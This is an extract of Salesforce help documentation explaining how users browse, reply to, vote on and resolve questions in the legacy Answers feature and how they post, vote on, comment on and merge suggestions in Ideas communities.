• Choose a reply as the best answer. You can only choose a best answer if you asked the question or are a Salesforce
administrator.

If a question has already been resolved, you can click Mark as Not Answered above the question to re-open it.

• Sort replies by

◊ Newest—Shows the most recently posted replies at the top of the list.

◊ Oldest—Shows the oldest replies at the top of the list.

◊ Most Votes—Shows the replies with the greatest number of “likes” and “dislikes” (added together) at the top of the
list.

See Also:
Answers Overview
Using Answers
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Browsing Questions within a Zone or Category

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Read” on questionsTo vote for replies:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

To view all questions within a zone or category, go to the Answers tab and click the zone name or category that appears below
the Get an Answer heading.

Browsing Questions within a Zone

After clicking the zone name to view all questions within that zone, you can:

• Ask a question.
• Filter questions so you only see the open or resolved questions. A question is considered resolved when the person who

asked the question selects one of the replies as the best answer. Community members can continue to post replies and vote
for replies even when the question has been resolved.

• Sort questions by:

◊ Recent Activity—Shows the questions that have the most recent replies at the top of the list
◊ Newest—Shows the questions that have been most recently asked at the top of the list
◊ Oldest—Shows the oldest questions at the top of the list

• Click Reply below a question to post a reply.
• Click a category to view all the questions associated with that category.

All the categories within your zone appear under the zone name at the top of the page.

The question icons identify whether the question has been resolved or is still open.

Browsing Questions within a Category

When community members ask a question, they associate a single category with their question to make it easier to find within
the community. To browse all questions associated with a category, click the category name to display the category detail page.

You can click on a category from the following locations:

• When viewing a question, the categories associated with that question appear below the question description.
• When browsing questions within a zone, all the categories in the zone appear below the zone name.
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• On the answers home page, all the categories in the zone appear below the zone name.

From the category detail page, you can:

• Ask a question that is automatically associated with the category you are viewing.
• View all questions associated with that category, or filter the questions so you only see the open or resolved questions. A

question is considered resolved when the person who asked the question selects one of the replies as the best answer.
Community members can continue to post replies and vote for replies even when the question has been resolved.

• Sort questions by:

◊ Recent Activity—Shows the questions that have the most recent replies at the top of the list
◊ Newest—Shows the questions that have been most recently asked at the top of the list
◊ Oldest—Shows the oldest questions at the top of the list

• Click Reply below a question to post a reply.

The question icons identify whether the question has been resolved or is still open.

See Also:
Answers Overview

Replying to a Question

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Read” on questionsTo vote for replies:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

To reply to a question:

• If you're viewing a list of questions within a community or category, click Reply next to question you want to respond to.
Enter your reply in the editor and click Reply.

• If you're viewing the details of a question, enter your reply in the space provided at the bottom of the page, and click Reply.

After you reply to a question:

• Community members can vote on whether they like dislike your reply.
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• The person who asked the question can choose your reply as the best answer.

See Also:
Answers Overview
Voting for a Reply
Choosing the Best Answer to a Question
Escalating a Question to a Case

Editing and Deleting a Reply

Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Edit” on questionsTo edit replies:

“Delete” on questionsTo delete replies:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

Standard users without the “edit” and “delete” permissions on the answers object cannot edit or delete their replies. However,
as the Salesforce administrator, you can edit or delete any reply posted to a community. For example, you may want to monitor
your answers community and edit or delete replies that contain inappropriate content or offensive language.

To edit or delete a reply:

1. Click the question title to view a list of all replies for the question.
2. Click Edit or Delete next to the reply you want to change or remove. When deleting a reply, the reply goes to the Recycle

Bin.

Another way to prevent offensive language is to create a validation rule that prevents users from entering specific words when
posting a reply.

To create validation rules, from Setup, click Customize > Answers > Question > Validation Rules and Customize > Answers
> Reply > Validation Rules.
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Voting for a Reply

Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Read” on questionsTo vote for replies:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

When you vote on a reply, you contribute to the answers community by identifying the replies that contains the most helpful
(and unhelpful) information. When other community members look for an answer to a question, they can quickly look at the
number of “likes” and “dislikes” a reply has received and make a more informed decision about which reply to read.

In addition, the more votes a reply receives the easier it is for the person who asked the question to choose a reply as the best
answer.

When viewing a question, review the replies and click Like to voice your approval of a reply or Dislike if a reply contains
incorrect or unhelpful information. Your vote (either a +1 or –1) is included in the Like or Dislike total for that reply. You
can't vote for your own reply and you can only vote once for each reply.

See Also:
Answers Overview
Using Answers
Replying to a Question
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Choosing the Best Answer to a Question

Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Read” on questionsTo vote for replies:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

After you ask a question, you should monitor the replies posted by other community members and eventually choose one of
the replies as the best answer. The best answer is highlighted directly below the question so it's easy to find, which helps
community members quickly identify the most useful resolution to the question.

Only Salesforce administrators and the person who asked the question can mark a reply as the best answer.

To choose the best answer:

1. From the Answers tab, find your question and click its title.
2. Decide which reply is the best answer, and click Choose as Best Answer.

To identify the best answer, look at the votes (“likes” and “dislikes”) for each reply. The reply with the most “likes” probably
contains the most useful information. If a question has many replies, try sorting the replies by Most Votes so the replies
with the most likes and dislikes appear at the top of the list.

After you choose a best answer:

• The question is marked as “resolved”. Community members can continue to post and vote on replies for resolved questions.

• If another reply that you like better is posted in the future, simply choose that reply as the best answer to replace the old
best answer.

• To clear a question so it is no longer resolved, click Mark as Not Answered above the question.

See Also:
Creating an Article from a Reply
Replying to a Question
Voting for a Reply
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Viewing Your Questions and Replies

Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Read” on questionsTo vote for replies:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

Once you become an active community member, you can view a list of all the questions you asked and replies you posted by
clicking My Questions & Replies at the top of any page in the Answers tab.

When viewing a list of your questions, you can quickly identify which questions you resolved and which questions are still
open. (Resolved questions have a best answer.) You can sort your questions by:

• Newest—Shows your most recently asked questions at the top of the list

• Recent Activity—Shows your most recently asked questions and your questions that have the most recent replies at the
top of the list

• Oldest—Shows your oldest questions at the top of the list

When viewing a list of your replies, the question title appears as a link followed by your reply. You can sort your replies by:

• Newest—Shows your most recently posted replies at the top of the list.

• Oldest—Shows your oldest replies at the top of the list.

• Most Votes—Shows your replies that have received the greatest number of “likes” and “dislikes” (added together) at the
top of the list.

The following table describes the icons displayed on the page:

DescriptionIcon

A question that has been resolved. To resolve a question, the person who asked the question chooses
a reply as the best answer.

A question that community members have replied to. For example, this icon represents a question
with four replies. If a question has no replies, a “0” appears in this icon.

A reply to a question.
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DescriptionIcon

A reply that has been marked as the best answer to a question.

See Also:
Answers Overview
Asking a Question
Replying to a Question

Creating an Article from a Reply

Data categories and answers are available in: Enterprise, Unlimited, and Developer Editions.

Salesforce Knowledge is available for an additional cost in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Create” and “Read” on the article type used to promote replies

AND

“Edit” on questions

AND

Knowledge User checked on user detail page

To promote a reply:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

In an answers community, you may want to turn a particularly helpful answer into an article in your knowledge base. To create
an article:

1. Click the question title to view a detail page showing the question and its replies.
2. On the reply you want to add to the knowledge base, click Promote to Article.
3. Edit your article. The fields that appear depend on the default article type assigned to replies, but the following is true for

all article types:
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• The Title field contains the title of the question.
• The Summary field contains the reply.
• You can make new data category selections for the article. Unlike answers, articles support multiple category groups.

Note:  An administrator can change the article type and assignee.

4. Click Save. The original reply now has a status message indicating its association with an article. When the article is
published, the message on the reply includes a link to the article.

See Also:
Answers Overview
Salesforce Knowledge Overview
Publishing Articles and Translations

Escalating a Question to a Case

Answers is available in: Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Read” on questionsTo view the Answers tab:

“Create” on questionsTo ask and reply to questions:

“Create” on casesTo create cases:

Note: Starting with Summer ’13, Answers isn’t available for new organizations. Now you can use Chatter Answers,
a self-service and support community where users can post questions and receive answers and comments from other
users or your support agents. Chatter Answers brings together Case, Questions and Answers, and Salesforce Knowledge
articles in a unified experience. Existing organizations will continue to have access to Answers if it was enabled prior
to the Summer ’13 release.

If a question remains unresolved or its reply isn't satisfactory, administrators and trusted community members can escalate the
question to a case. After a case is created, the question detail page provides a link to the case for the life of the question. This
link also shows the status of the case.

Note:  Closing the case does not mark the question as resolved, and resolving the question does not close the case.
The case and the question must be updated separately.

To escalate a question to a case:

1. Click the question title.
2. On the question detail page, click Escalate to Case. This button only appears if an administrator has configured the

appropriate case settings.
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3. Update the case fields if you want to change any default values. The question title automatically becomes the case Subject.
4. Click Save. You are returned to the question detail page and the case is now available for the Case Owner to resolve.

See Also:
Asking a Question
Creating Cases

Ideas Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on ideasTo view the Ideas tab:

“Read” on ideasTo view and vote for ideas:

“Create” on ideasTo create ideas and add comments to ideas:

“Edit” on ideasTo edit ideas and edit comments on ideas:

Ideas is a community of users who post, vote for, and comment on ideas. An Ideas community provides an online, transparent
way for you to attract, manage, and showcase innovation.

Tip: Salesforce.com offers its own Ideas community for Salesforce users to submit product feedback and suggest new
features. To visit, go to http://ideas.salesforce.com.

Ideas Terminology

The following terminology is used for Ideas:

Category, Ideas
Categories are administrator-defined values that help organize ideas into logical sub-groups within a zone. The View
Category drop-down list on the Ideas tab allows users to filter ideas by category, and the Categories picklist on the
Post Ideas page lets users add categories to their ideas. For example, if your ideas zone has the focus “Improvements to
our clothing line,” then you might set up categories such as “Shirts,” “Jackets,” and “Slacks.” Each organization has one
common set of categories that can be added or removed from each zone. An administrator defines separate categories
for their ideas and answers zones.

Comment
Comments are plain text responses to posted ideas that enable discussions about the ideas. On the Ideas tab, the Comments
subtab lists the comments that have most recently been submitted. On the detail page of an idea, comments are sorted
in chronological order from oldest to newest.

Community
Communities are customizable public or private spaces for employees, end-customers, and partners to collaborate on
best practices and business processes.
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Community Expert
A community expert is a member of the community who speaks credibly and authoritatively on behalf of your organization.
When a community expert posts a comment or idea, a unique icon ( ) displays next to his or her name so other
community members can easily identify credible information within the community. The Salesforce administrator can
designate as many community experts as necessary.

Demote
If you dislike an idea, you can click demote to subtract 10 points from its overall score and decrease the idea's overall
popularity ranking. You cannot demote the same idea more than once, and after you demote an idea you cannot promote
it. An idea can have negative overall points if more users demote the idea than promote it.

Half-life
The half-life setting determines how quickly old ideas drop in ranking on the Popular Ideas subtab, to make room for
ideas with more recent votes. A shorter half-life moves older ideas down the page faster than a longer half-life. This
setting affects all zones in your organization.

Idea
Ideas are suggestions posted by the members of an ideas community and are organized by zones. For example, if the
focus of a particular zone is “Ideas for car features,” an appropriate idea for that zone might have the title “Insulated cup
holders that keep your beverage hot or cold.” Or, if the focus of a particular zone is “Ideas for our company's employee
benefits,” an appropriate idea for that zone might have the title “On-site day care.”

Idea Themes
Idea Themes provide a forum in which you invite community members to post ideas about specific topics so that
community members can solve problems or propose innovations for your company.

Point
A point is a unit of measurement that represents the popularity of an idea. Each vote for an idea is worth ten points
(promote adds 10 points and demote removes 10 points). An idea's total number of points displays to the left of the idea.

Popular Ideas
On the Popular Ideas subtab, ideas are sorted by an internal calculation that reflects the age of an idea's positive votes.
Regardless of an idea's static total number of points, ideas with newer positive votes display higher on the page than
ideas with older positive votes. This allows you to browse ideas that have most recently gained popularity, with less
precedence given to long-established ideas that were positively voted on in the past.

Portal
If your organization has a Customer Portal or partner portal, you can add the Ideas tab to either or both portals so that
portal users can participate in their own Ideas communities. The Zone list at the top of the Ideas tab lists all the available
zones, and each zone contains its own unique group of ideas.

Promote
If you agree with or like an idea, click promote to add 10 points to the idea. You cannot promote the same idea more
than once and you cannot promote an idea that you have already demoted. Salesforce automatically adds your promote
vote to any idea you post.

Recent Activity
Your Recent Activity page contains a summary of all the recent activity that relates to your participation within a zone.
For example, this page lists all the ideas and comments you have posted to a zone as well as the ideas you have voted on.
You can view your Recent Activity page by clicking your nickname located on the right side of the Ideas tab.
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Status
An idea's status helps zone members track the progress of the idea. For example, “Under Review”, “Reviewed”, “Coming
Soon”, and “Now Available” are common status values an administrator can define and assign to ideas. An idea's status
appears next to the idea's title for all zone members to see.

Top All Time Ideas
On the Top All-Time subtab, ideas are sorted from most number of points to fewest. This allows you to see the most
popular ideas in the history of your Ideas zone.

Vote, Idea
In an ideas community, a vote means you have either promoted or demoted an idea. After you vote on an idea, your
nickname displays at the bottom of the idea's detail page to track that your vote was made. You can use your Recent
Activity page to see a list of all the ideas you have voted on.

Zone
Zones organize ideas and questions into logical groups, with each zone having its own focus and unique ideas and
questions.

Using Ideas
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on ideasTo view the Ideas tab:

“Read” on ideasTo view and vote for ideas:

“Create” on ideasTo create ideas and add comments to ideas:

“Edit” on ideasTo edit ideas and edit comments on ideas:

Ideas is a community of users who post, vote for, and comment on ideas. An Ideas community provides an online, transparent
way for you to attract, manage, and showcase innovation. You can:

• Post ideas

• View ideas or Idea Themes

• Search for ideas

• Vote for ideas

• Comment on ideas

• View recent activity and replies

• Subscribe to syndication feeds
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Each time you click the Ideas tab, the Popular Ideas subtab displays ideas in all categories. To change your current view, click
one of the other subtabs like Recent Ideas or Top All-Time. Click List to toggle back to the list view.

See Also:
Ideas Overview
Administrator setup guide: Salesforce Ideas Implementation Guide

Viewing Ideas

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on ideasTo view the Ideas tab:

“Read” on ideasTo view and vote for ideas:

“Create” on ideasTo create ideas and add comments to ideas:

“Edit” on ideasTo edit ideas and edit comments on ideas:

The following sections describe how to view ideas:

• Accessing the Ideas Tab in Salesforce

• Accessing the Ideas Tab in a Portal

• Browsing Popular Ideas

• Browsing Recent Ideas

• Browsing Top Ideas of All Time

• Viewing Ideas by Category

• Viewing Ideas by Status

• Browsing Ideas in Other Zones

• Viewing the Details of an Idea

Accessing the Ideas Tab in Salesforce

In Salesforce, the Ideas tab is available by default in the Community app. You can select this app from the Force.com app
menu in the top right corner of any Salesforce page.

Note that your administrator may have customized your profile to also display the Ideas tab in other apps. Also, your
administrator may have renamed the Ideas tab to an alternate tab name.

Click  to display the Ideas tab. Click List to toggle back to the list view.

Tip: The Zone list at the top of the Ideas tab lists all the available zones, and each zone contains its own unique
group of ideas.
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Accessing the Ideas Tab in a Salesforce.com Community

If your organization has created a Salesforce.com Community, your administrator can display the Ideas tab to the community
by adding it to the list of selected tabs during setup of the community.

Accessing the Ideas Tab in a Portal

If your organization has portal users who have access to a Customer Portal or partner portal, your portal's administrator can
display the Ideas tab on either type of portal. The ideas that display in a portal are either created through a portal or are created
internally in Salesforce and published for display in a portal.

Browsing Popular Ideas

On the Popular Ideas subtab, ideas are sorted by an internal calculation that reflects the age of an idea's positive votes. Regardless
of an idea's static total number of points, ideas with newer positive votes display higher on the page than ideas with older
positive votes. This allows you to browse ideas that have most recently gained popularity, with less precedence given to
long-established ideas that were positively voted on in the past.

Browsing Recent Ideas

The Recent Ideas subtab lists the ideas that have most recently been submitted. Newer ideas display above older ideas.

Browsing Top Ideas of All Time

The Top All-Time subtab lists the ideas with the most points. The difference between the Top All-Time subtab and the
Popular Ideas subtab is that the Top All-Time subtab displays the top ideas of all time by number of points, whereas the
Popular Ideas subtab uses an algorithm to display the ideas that have received the most recent positive votes.

Viewing Ideas by Category

Categories are administrator-defined values that help organize ideas into logical sub-groups within a zone. The View Category
drop-down list on the Ideas tab allows users to filter ideas by category, and the Categories picklist on the Post Ideas page
lets users add categories to their ideas.

To browse ideas by category, select a category from the View Category drop-down list. Alternatively, click the category
link at the bottom of the idea description, next to the user who posted the idea.

Viewing Ideas by Idea Themes
You can view all of the ideas that are posted to an idea theme. From the Idea Themes detail page, you can manage an idea
theme and its related ideas.

Viewing Ideas by Status

An idea's status helps zone members track the progress of the idea. For example, “Under Review”, “Reviewed”, “Coming
Soon”, and “Now Available” are common status values an administrator can define and assign to ideas. An idea's status appears
next to the idea's title for all zone members to see.

To view all ideas of a particular status, go to the Ideas tab and select a value from the Status drop-down list. Alternatively,
click the status link next to an idea to view all ideas in the zone with that status.

Browsing Ideas in Other Zones

Administrators can create multiple zones with each zone having its own unique list of ideas. For this reason, it is important
to verify you are viewing the correct zone when browsing ideas. To browse ideas in a specific zone, select a zone from the list
of zones the top of the page.
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Viewing the Details of an Idea

Click the title of an idea to open the detail page of that idea. The detail page of an idea includes the following sections:

• The details of the idea, including its full text and number of points
• The related idea theme and the zone to which it belongs.
• All comments that have been submitted for the idea
• An area for adding a new comment
• A list of the last 100 users who have voted (promoted or demoted) for the idea, sorted left to right from most recent vote

to oldest vote
• If you are an administrator, the detail page lets you edit, delete, and merge ideas.

See Also:
Ideas Overview
Voting on Ideas
Commenting on Ideas
Posting and Editing Ideas
Using Ideas
Tip sheet: Using Salesforce Ideas

Searching for Ideas

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on ideasTo view the Ideas tab:

“Read” on ideasTo view and vote for ideas:

“Create” on ideasTo create ideas and add comments to ideas:

“Edit” on ideasTo edit ideas and edit comments on ideas:

Note:  Searches performed by internal users return results from all ideas that are available within the organization.
Searches performed by all other users in Salesforce Communities return results from the ideas that are available within
the community.

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
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3. From the search results, click an item to open it or click Edit, if available.

See Also:
Ideas Overview
Viewing Ideas
Using Ideas

Voting on Ideas

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on ideasTo view the Ideas tab:

“Read” on ideasTo view and vote for ideas:

“Create” on ideasTo create ideas and add comments to ideas:

“Edit” on ideasTo edit ideas and edit comments on ideas:

In an ideas community, a vote means you have either promoted or demoted an idea.If you agree with or like an idea, click
promote to add 10 points to the idea. You cannot promote the same idea more than once and you cannot promote an idea
that you have already demoted. Salesforce automatically adds your promote vote to any idea you post.

If you dislike an idea, you can click demote to subtract 10 points from its overall score and decrease the idea's overall popularity
ranking. You cannot demote the same idea more than once, and after you demote an idea you cannot promote it. An idea can
have negative overall points if more users demote the idea than promote it.

To vote on an idea:

1. On the Ideas tab, locate an idea you want to promote or demote.
2. To add 10 points to the idea, click promote next to the idea. To subtract 10 points from the idea, click demote. After you

have voted, your Nickname displays at the bottom of the idea's detail page to track that your vote was made.

Note:  When you post a new idea, you automatically cast a vote for that idea and 10 points are added to the idea's
score.

See Also:
Ideas Overview
Viewing Ideas
Searching for Ideas
Using Ideas
Viewing Your Recent Activity Page
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Commenting on Ideas

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on ideasTo view the Ideas tab:

“Read” on ideasTo view and vote for ideas:

“Create” on ideasTo create ideas and add comments to ideas:

“Edit” on ideasTo edit ideas and edit comments on ideas:

Comments are plain text responses to posted ideas that enable discussions about the ideas. On the Ideas tab, the Comments
subtab lists the comments that have most recently been submitted. On the detail page of an idea, comments are sorted in
chronological order from oldest to newest.

Adding Comments to Ideas

Add comments to ideas to share your thoughts and opinions with other community members:

1. On the Ideas tab, locate an idea on which you want to add a comment.
2. Click either the title of the idea or the Comments link below the idea description.
3. On the detail page for the idea, type your comments into the text entry area in the Add Your Comment section. You can

enter up to 4,000 characters.

If your organization has enabled the HTML editor for Ideas, the description can include HTML and reference online
images. If the HTML editor is not enabled, use plain text only. .

4. Click Post to submit your comment.

Your newly added comment displays in the Comments related list on the idea detail page.

Editing Comments on Ideas

To edit a comment that you have submitted on an idea:

1. On the detail page of the idea, click Edit next to your comment.
2. Modify your comment as desired.
3. Click Apply to save your work.

Deleting Comments on Ideas

Deleting comments on ideas requires the “Delete” permission on ideas.

1. On the detail page of the idea, click Del next to your comment.
2. Click OK.

Viewing Recently Posted Comments

To view the comments that have most recently been posted in your Ideas community, click the Comments subtab and select
a zone in which to view comments. Click the text of a comment to view the detail page of the appropriate idea.
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On the Comments subtab:

• Comments are listed in chronological order from newest to oldest.
• The title of the idea on which the comment was posted displays above the comment.
• The alias of the user who posted the comment displays next to the comment text.
• The total number of comments on the idea displays in brackets below the comment text. For example, Comments [20]

indicates that the idea has twenty comments.

See Also:
Ideas Overview
Viewing Ideas
Searching for Ideas
Using Ideas

Deleting Ideas

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Delete” on ideasTo delete ideas and comments:

To delete an idea:

1. Click the name of an idea to open the detail page.
2. Click the Delete button.
3. Click OK.

The idea, its comments, and any child ideas are moved to the Recycle Bin. Note that undeleting an idea from the Recycle Bin
also restores the idea's comments, votes, and child ideas.

See Also:
Merging Ideas
Posting and Editing Ideas
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Viewing Your Recent Activity Page

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on ideasTo view the Ideas tab:

“Read” on ideasTo view and vote for ideas:

“Create” on ideasTo create ideas and add comments to ideas:

“Edit” on ideasTo edit ideas and edit comments on ideas:

Your Recent Activity page contains a summary of all the recent activity that relates to your participation within a zone. To
view your Recent Activity page, go to the Ideas tab and click your Nickname link on the right side of the page. To view the
Recent Activity page of another member of the zone, click the community member's name that appears below any idea or
comment they have posted. You can view activity for the different zones you have access to by selecting a zone from the Zone
list.

The Recent Activity page uses the following icons to identify the various types of activity:

•  identifies the ideas you have submitted.
•  identifies the ideas you have voted on.
•  identifies the comments you have posted to ideas as well as the comments other users have posted to your ideas.

For additional detail, click the following links located on the left side of the Recent Activity page:

• Ideas Submitted lists the ideas you have posted to this zone. The most recent idea appears first.

• Ideas Voted On lists the ideas in this zone that you have either promoted or demoted.

• Recent Replies displays the most recent comment posted to each of your ideas, as well as the most recent comment posted
to each idea you have previously commented on. This section is not displayed when viewing another community member's
recent activity.

To quickly determine the number of recent replies you have received, look next to the recent replies icon ( ) in the upper
right corner of the Ideas tab. This icon only appears when you have received a new reply.

Note:  You can’t upload your own picture to replace the default image.

See Also:
Ideas Overview
Viewing Ideas
Using Ideas
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Subscribing to Syndication Feeds for Ideas

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on ideasTo view the Ideas tab:

“Read” on ideasTo view and vote for ideas:

“Create” on ideasTo create ideas and add comments to ideas:

“Edit” on ideasTo edit ideas and edit comments on ideas:

Syndication feeds enable users to subscribe to changes within Ideas and receive updates in external news readers. For users to
be able to subscribe to Ideas syndication feeds, the following prerequisites are necessary:

• Ideas must be exposed publicly using Force.com sites.

• The Categories field must be enabled in Ideas. This field is enabled by default for some organizations.

To subscribe to a syndication feed, click the feeds icon ( ) on the following Ideas pages:

• Popular Ideas subtab

• Recent Ideas subtab

• Top All-Time subtab

• Comments subtab

This feed lists comments separately even when they belong to the same idea, whereas the Comments subtab groups
comments for a single idea together and only shows the number of recent comments for that idea.

• Recent Activity page

To subscribe to a feed that includes all the comments posted by a specific community member, click the community
member's name that appears below any idea or comment he or she has posted. Then click the feeds icon on the community
member's Recent Activity page. When you subscribe to another community member's Recent Activity feed, the feed only
includes recent comments from that community member and no other user.

Note:  Child ideas (ideas that have been merged with a master idea) are not included in any feeds. Only master ideas
are included.

See Also:
Ideas Overview
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Posting and Editing Ideas

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on ideasTo view the Ideas tab:

“Read” on ideasTo view and vote for ideas:

“Create” on ideasTo create ideas and add comments to ideas:

“Edit” on ideasTo edit ideas and edit comments on ideas:

Posting Ideas

1. Use the search box in the sidebar to search for existing ideas that match your idea. This helps reduce the number of duplicate
ideas in the community. If no existing ideas match your idea, proceed to the next step.

2. Create a new idea using one of the following options:

• On the Ideas tab, select the appropriate community from the Community list at the top of the page and click Post
Idea.

• From the Ideas list view, click New Idea, then select a community, and click Continue.
• From the sidebar, select Idea from the Create New drop-down list, select a community, and click Continue.

3. If you’re posting the idea to an idea theme, select one from the list. You can only post ideas to idea themes that exist within
your community.

4. Enter a title for your idea no longer than 255 characters.

After you enter the title, Salesforce searches the community for ideas with the same words in their title or description and
then displays the top five matching ideas. If one of these ideas looks similar to your own, click that idea's title to open its
detail page in a new window. From the detail page, you can read a description of the idea and vote for it instead of posting
your duplicate idea to the community. If none of the ideas in the list are similar to your idea, proceed with the following
steps to post your unique idea.

5. In the description area, enter the details of your idea.

If your organization has enabled the HTML editor for Ideas, the description can include HTML and reference online
images. If the HTML editor is not enabled, use plain text only. .

6. Choose one or more categories for your idea.
7. If you are an administrator, optionally choose a status for your idea. The Status drop-down list is only visible to

administrators.
8. If enabled by your administrator, you can add an attachment to your idea:

• Click Browse to locate and attach a file from your computer.

You can attach any supported file types, including Microsoft® PowerPoint® presentations and Excel® spreadsheets,
Adobe® PDF files, image files, audio files, and video files. The maximum attachment size is determined by your
organization.

• Optionally, type a title for the file. If you don’t enter a title, the filename appears as the attachment’s title.

9. Click Post.
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Your new idea displays at the top of the Recent Ideas subtab, and your vote (promote) is automatically applied to the idea.
Each vote is always worth 10 points.

Tip:  Use the following writing tips to make your idea easier for others to read and understand:

• Use complete sentences.
• Be as concise and direct as possible.
• Check your spelling and punctuation.

Editing Ideas

If you have the “edit” permission on ideas, you can edit the details of an existing idea:

1. On the Ideas tab, click the title of an idea.
2. Click Edit.
3. Modify the title, description, category, and status (administrators only) of the idea as appropriate.
4. Click Apply to save your work.

Editing an idea's details does not allow you to edit the comments on an idea.

See Also:
Ideas Overview
Using Ideas
Tip sheet: Using Salesforce Ideas

Merging Ideas

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Edit” on ideasTo merge multiple ideas:

Overview

As more users contribute to a zone, the number of duplicate ideas often increases. Duplicate ideas make it difficult to measure
feedback because votes and comments are spread out over many similar ideas. The best way to resolve this issue is to merge
duplicate ideas together so one idea becomes the master to one or more child ideas.

Note the following about merging ideas.

• Once you merge ideas they cannot be separated.
• All votes belonging to child ideas are transferred to the master idea. If the same community member votes for two ideas

that are eventually merged, only the vote for the master idea is kept; the vote for the child idea is discarded.
• Users can only vote for and add comments to a master idea.
• You cannot merge ideas in separate zones.
• Deleting a parent idea automatically deletes all child ideas. Child ideas cannot be deleted individually.
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• The master idea does not inherit the status and category values of its child ideas.
• When an idea is merged and becomes a child idea, the child idea still appears on the Ideas Submitted page but not on any

other pages in a zone member's Recent Activity.
• Merged ideas don’t appear in the list of submitted ideas on the Idea Themes detail page and aren’t counted in the Submitted

Ideas field.
• When you merge a child idea, you can no longer edit the Idea Theme field.
• A child idea that has been merged is still visible to the user who submitted the idea from the Ideas Submitted list on the

user’s Recent Activity page.

Merging Ideas

To locate duplicate ideas and merge them together:

1. On the Ideas tab, click the title of an idea that you want to merge.
2. On the idea's detail page, click Find Duplicates. Salesforce searches all the ideas within the zone and displays the five

ideas with titles that most closely match the current idea's title.
3. If the Possible Duplicates list does not contain any ideas that you want to merge, enter keywords in the Search for

Duplicates field and click Search. Salesforce displays a new list of possible duplicate ideas.
4. From the Possible Duplicates list, select the ideas that you want to merge.

To view the details of a possible duplicate idea, click the idea's title. Use your browser's back button to return to the search
results.

5. Click Merge with Current Idea.
6. Select the idea that you want to be the master idea, and click Merge.
7. Click OK to complete the merge.

Tips on Using Ideas

Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Read” on ideasTo view the Ideas tab:

“Read” on ideasTo view and vote for ideas:

“Create” on ideasTo create ideas and add comments to ideas:

“Edit” on ideasTo edit ideas and edit comments on ideas:

“Customize Application”To create communities:

Consider the following information when setting up and using Ideas:

• To monitor the activity of Ideas, you can:

◊ Create a workflow rule or trigger based on the number of comments an idea receives. You cannot create a workflow
rule or trigger based on an idea’s vote total or vote count. You also cannot create a trigger that inserts or deletes a
comment when the Idea object is updated.
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◊ Create a custom report based on an idea's vote score or number of comments.

• When posting an idea or comment, you can include a URL in the idea's description or comment field, but you cannot
attach a file or add a note to an idea.

• Master detail relationships are not supported.

• Ideas does not support workflow tasks, outbound messages, and approvals.

• Ideas does not support custom links.

• The Ideas detail page does not contain related lists.

